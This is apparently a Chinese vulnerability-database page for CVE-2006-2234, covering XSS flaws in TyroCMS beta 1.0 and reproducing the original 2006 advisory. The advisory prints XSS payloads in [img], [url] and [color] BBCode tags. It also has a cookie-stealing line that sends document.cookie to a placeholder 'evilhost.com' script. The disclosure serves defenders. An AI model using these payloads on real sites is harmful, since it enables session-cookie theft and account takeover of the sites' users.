TyroCMS 多个跨站脚本攻击(XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195111 漏洞类型 跨站脚本
发布时间 2006-05-05 更新时间 2006-05-05
CVE编号 CVE-2006-2234 CNNVD-ID CNNVD-200605-092
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/83922
https://cxsecurity.com/issue/WLB-2006050045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-092
|漏洞详情
TyroCMSbeta1.0存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助(1)imgBBCodetag中的javascriptURI,或(2)urlBBCodetag或(3)colorBBCodetag中的JavaScript事件,注入任意Web脚本或HTML。
|漏洞EXP
TyroCms beta V1.0 multiple XSS injections

Discovered by: Nomenumbra

Date: 5/2/2006

impact:moderate (privilege escalation,possible defacement)

TyroCMS is a PHP & MySql powered content management system(cms).

Inludes built-in forums, powerful admin control panel, secure user system, and much more.

Easily manage the site throuh the admin panel even if you do not have great webmastering skills!

Due to the way BBcode is interprented by TyroCms it is possible to inject javascript in several statements like:

In images:

[img]javascript:alert('xss')[/img]

or in urls:

[url=x" onmouseover="alert('xss')]Site Name[/url]

or in colors:

[color=red" onmouseover="alert('xss')]lol[/color]

See? We could inject javascript like this:

javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c=
'+document.cookie)

to steal cookies.

Nomenumbra/[0x4F4C]
|受影响的产品
Tyrocms Tyrocms Beta 1.0
|参考资料

来源:BUGTRAQ
名称:20060502TyroCmsbetaV1.0multipleXSSinjections
链接:http://www.securityfocus.com/archive/1/archive/1/432730/100/0/threaded
来源:XF
名称:tyrocms-bbcode-xss(26222)
链接:http://xforce.iss.net/xforce/xfdb/26222
来源:SREASON
名称:848
链接:http://securityreason.com/securityalert/848